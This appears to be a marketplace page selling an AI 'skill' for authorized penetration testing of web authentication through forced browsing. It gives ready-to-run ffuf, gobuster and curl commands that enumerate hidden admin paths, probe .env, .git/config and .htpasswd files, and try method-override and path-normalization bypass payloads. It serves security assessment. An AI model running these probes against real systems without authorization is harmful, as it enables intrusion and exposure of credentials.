Claude
Skills
Sign in
Back

bypassing-authentication-with-forced-browsing

Included with Lifetime
$97 forever

Discovering and accessing unprotected pages, APIs, and administrative interfaces by enumerating URLs and bypassing authentication controls during authorized security assessments.

Securitypenetration-testingauthentication-bypassforced-browsingffufdirectory-enumerationowaspscripts

What this skill does


# Bypassing Authentication with Forced Browsing

## When to Use

- During authorized penetration tests to discover hidden or unprotected administrative pages
- When testing whether authentication is consistently enforced across all application endpoints
- For identifying backup files, configuration files, and debug interfaces left exposed in production
- When assessing access control on API endpoints that should require authentication
- During security audits to validate that all sensitive resources enforce session validation

## Prerequisites

- **Authorization**: Written penetration testing agreement covering directory enumeration
- **ffuf**: Fast web fuzzer (`go install github.com/ffuf/ffuf/v2@latest`)
- **Gobuster**: Directory brute-force tool (`apt install gobuster`)
- **Burp Suite**: For intercepting and analyzing requests and responses
- **Wordlists**: SecLists collection (`git clone https://github.com/danielmiessler/SecLists.git`)
- **Target access**: Network connectivity and valid test credentials for authenticated comparison

## Workflow

### Step 1: Enumerate Hidden Directories and Files

Use ffuf or Gobuster to discover paths not linked in the application's navigation.

```bash
# Directory enumeration with ffuf
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -mc 200,301,302,403 \
  -fc 404 \
  -o results-dirs.json -of json \
  -t 50 -rate 100

# File enumeration with common extensions
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
  -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env \
  -mc 200,301,302,403 \
  -fc 404 \
  -o results-files.json -of json \
  -t 50 -rate 100

# Gobuster for directory enumeration
gobuster dir -u https://target.example.com \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -s "200,204,301,302,307,403" \
  -x php,asp,aspx,jsp,html \
  -o gobuster-results.txt \
  -t 50
```

### Step 2: Discover Administrative and Debug Interfaces

Target common administrative paths and debug endpoints.

```bash
# Admin panel enumeration
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -mc 200,301,302 \
  -t 50 -rate 100

# Common admin paths to check manually:
# /admin, /administrator, /admin-panel, /wp-admin
# /cpanel, /phpmyadmin, /adminer, /manager
# /console, /debug, /actuator, /swagger-ui
# /graphql, /graphiql, /.env, /server-status

# API endpoint discovery
ffuf -u https://target.example.com/api/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,201,204,301,302,401,403 \
  -fc 404 \
  -o api-results.json -of json

# Check for Spring Boot Actuator endpoints
for endpoint in env health info beans configprops mappings trace; do
  curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n" \
    "https://target.example.com/actuator/$endpoint"
done
```

### Step 3: Test Authentication Enforcement on Discovered Endpoints

Compare responses between unauthenticated and authenticated requests.

```bash
# Test without authentication
curl -s -o /dev/null -w "%{http_code}" \
  "https://target.example.com/admin/dashboard"

# Test with valid session cookie
curl -s -o /dev/null -w "%{http_code}" \
  -b "session=valid_session_token_here" \
  "https://target.example.com/admin/dashboard"

# Automated check: compare response sizes
# Unauthenticated request
curl -s "https://target.example.com/admin/users" | wc -c

# Authenticated request
curl -s -b "session=valid_token" \
  "https://target.example.com/admin/users" | wc -c

# If both return similar content, authentication is not enforced

# Test with Burp Intruder: send a list of discovered URLs
# without cookies and flag any 200 responses
```

### Step 4: Test HTTP Method-Based Authentication Bypass

Some applications only enforce authentication for specific HTTP methods.

```bash
# Test different HTTP methods on protected endpoints
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
  echo -n "$method: "
  curl -s -o /dev/null -w "%{http_code}" \
    -X "$method" "https://target.example.com/admin/settings"
done

# Test HTTP method override headers
curl -s -o /dev/null -w "%{http_code}" \
  -X POST \
  -H "X-HTTP-Method-Override: GET" \
  "https://target.example.com/admin/settings"

curl -s -o /dev/null -w "%{http_code}" \
  -H "X-Original-Method: GET" \
  -H "X-Rewrite-URL: /admin/settings" \
  "https://target.example.com/"
```

### Step 5: Test Path Traversal and URL Normalization Bypass

Exploit URL parsing differences to bypass path-based authentication rules.

```bash
# Path normalization bypass attempts
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"

# Double URL encoding
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"

# Trailing characters
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"
```

### Step 6: Discover Backup and Configuration Files

Search for sensitive files inadvertently exposed on the web server.

```bash
# Backup file discovery
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
  -e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip \
  -mc 200 -t 50 -rate 100

# Common sensitive files
for file in .env .git/config .git/HEAD .svn/entries \
  web.config wp-config.php.bak config.php.old \
  database.yml .htpasswd server-status phpinfo.php \
  robots.txt sitemap.xml crossdomain.xml; do
  status=$(curl -s -o /dev/null -w "%{http_code}" \
    "https://target.example.com/$file")
  if [ "$status" != "404" ]; then
    echo "FOUND ($status): $file"
  fi
done

# Git repository exposure check
curl -s "https://target.example.com/.git/HEAD"
# If this returns "ref: refs/heads/main", the git repo is exposed
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **Forced Browsing** | Directly accessing URLs that are not linked but exist on the server |
| **Directory Enumeration** | Brute-forcing directory and file names against a wordlist to discover hidden content |
| **Authentication Bypass** | Accessing protected resources without valid credentials due to missing access checks |
| **Path Normalization** | Exploiting differences in how web servers and application frameworks parse URL paths |
| **Method-based Bypass** | Using alternative HTTP methods (PUT, DELETE) that may not have authentication checks |
| **Information Disclosure** | Exposure of sensitive configuration files, backups, or debug interfaces |
| **Defense in Depth** | Layered security controls where authentication is enforced at multiple levels |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **ffuf** | Fast web fuzzer for directory, file, and parameter enumeration |
| **Gobuster** | Directory and DNS brute-forcing tool written in Go |
| **Feroxbuster** | Recursive content discovery tool with automatic recursion |
| **DirBuster** | OWASP Java-based directory brute-force tool with GUI |
| **Burp Suite** | HTTP proxy for request
Files: 4
Size: 30.5 KB
Complexity: 65/100
Category: Security
Source: https://github.com/mukul975/anthropic-cybersecurity-skills/tree/main/skills/bypassing-authentication-with-forced-browsing

Related in Security

mac-ops

Included

Comprehensive macOS workstation operations — diagnose kernel panics, identify failing drives, audit launchd startup items, decode wake reasons, triage TCC permission denials, manage APFS snapshots, recover from no-boot. Use for: Mac is slow, slow bootup, won't boot, kernel panic, kernel_task hot, mds_stores CPU, photoanalysisd, cloudd, login loop, gray screen, sleep wake failure, drive failing, IO errors, APFS snapshots eating space, Time Machine local snapshots, Spotlight indexing, launchd, LaunchAgent, LaunchDaemon, login items, TCC permissions, Full Disk Access, Screen Recording denied, Gatekeeper, quarantine, com.apple.quarantine, app is damaged, helper tool, /Library/PrivilegedHelperTools, pmset, wake reasons, dark wake, sysdiagnose, panic.ips, DiagnosticReports, configuration profile, MDM profile, remote diagnostics over SSH.

Securityscripts

a11y-audit

Included

Run accessibility audits on web projects combining automated scanning (axe-core, Lighthouse) with WCAG 2.1 AA compliance mapping, manual check guidance, and structured reporting. Output is configurable: markdown report only, markdown plus machine-readable JSON, or markdown plus issue tracker integration. Use this skill whenever the user mentions "accessibility audit", "a11y audit", "WCAG audit", "accessibility check", "compliance scan", or asks to check a web project for accessibility issues. Also trigger when the user wants to verify WCAG conformance or map findings to a specific standard (CAN-ASC-6.2, EN 301 549, ADA/AODA).

Securityscripts

erpclaw

Included

AI-native ERP system with self-extending OS. Full accounting, invoicing, inventory, purchasing, tax, billing, HR, payroll, advanced accounting (ASC 606/842, intercompany, consolidation), and financial reporting. 413 actions across 14 domains, 43 expansion modules. Constitutional guardrails, adversarial audit, schema migration. Double-entry GL, immutable audit trail, US GAAP.

Securityscripts

assess

Included

Assesses and rates quality 0-10 across multiple dimensions (correctness, maintainability, security, performance, testability, simplicity) with pros/cons analysis. Compares against project conventions and prior decisions from memory. Produces structured evaluation reports with actionable improvement suggestions. Use when evaluating code, designs, architectures, or comparing alternative approaches.

Securityscripts

spring-boot-security-jwt

Included

Provides JWT authentication and authorization patterns for Spring Boot 3.5.x covering token generation with JJWT, Bearer/cookie authentication, database/OAuth2 integration, and RBAC/permission-based access control using Spring Security 6.x. Use when implementing authentication or authorization in Spring Boot applications.

Securityscripts

code-hardcode-audit

Included

Detect hardcoded values, magic numbers, and leaked secrets. TRIGGERS - hardcode audit, magic numbers, PLR2004, secret scanning.

Securityscripts
Sign up & unlock — $97